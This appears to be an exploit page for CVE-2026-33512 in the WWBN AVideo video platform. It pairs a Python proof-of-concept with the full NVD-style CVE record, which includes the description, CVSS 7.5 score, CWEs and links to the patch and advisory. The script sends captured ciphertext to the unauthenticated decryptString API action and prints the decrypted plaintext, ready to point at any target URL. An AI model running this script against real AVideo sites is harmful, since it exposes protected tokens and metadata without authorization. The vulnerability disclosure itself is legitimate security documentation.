CVE-2026-33512

import requests # Target URL that exposes the vulnerable decryptString action target_url = "http://target-site.com/AVideo/plugin/API/decryptString.json.php" # Example ciphertext captured from public endpoints like view/url2Embed.json.php # In a real scenario, this string is retrieved from the application's public responses captured_ciphertext = "ENCRYPTED_PAYLOAD_FROM_APPLICATION" # Payload construction # The vulnerability lies in the lack of authentication for this action payload = { "string": captured_ciphertext } try: print("[*] Attempting to decrypt captured string...") response = requests.post(target_url, data=payload) if response.status_code == 200: print("[+] Request successful!") print("[+] Decrypted plaintext:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") print(response.text) except Exception as e: print(f"[-] An error occurred: {e}")

{"cve": {"id": "CVE-2026-33512", "sourceIdentifier": "[email protected]", "published": "2026-03-23T19:16:40.420", "lastModified": "2026-03-25T17:51:40.870", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "WWBN AVideo is an open source video platform. In versions up to and including 26.0, the API plugin exposes a `decryptString` action without any authentication. Anyone can submit ciphertext and receive plaintext. Ciphertext is issued publicly (e.g., `view/url2Embed.json.php`), so any user can recover protected tokens/metadata. Commit 3fdeecef37bb88967a02ccc9b9acc8da95de1c13 contains a patch."}, {"lang": "es", "value": "WWBN AVideo es una plataforma de video de código abierto. En versiones hasta la 26.0 inclusive, el plugin de la API expone una acción 'decryptString' sin autenticación alguna. Cualquiera puede enviar texto cifrado y recibir texto plano. El texto cifrado se emite públicamente (por ejemplo, 'view/url2Embed.json.php'), por lo que cualquier usuario puede recuperar tokens/metadatos protegidos. El commit 3fdeecef37bb88967a02ccc9b9acc8da95de1c13 contiene un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-312"}, {"lang": "en", "value": "CWE-326"}, {"lang": "en", "value": "CWE-327"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wwbn:avideo:*:*:*:*:*:*:*:*", "versionEndIncluding": "26.0", "matchCriteriaId": "774C24F1-9D26-484F-B931-1DA107C8F588"}]}]}], "references": [{"url": "https://github.com/WWBN/AVideo/commit/3fdeecef37bb88967a02ccc9b9acc8da95de1c13", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-mwjc-5j4x-r686", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}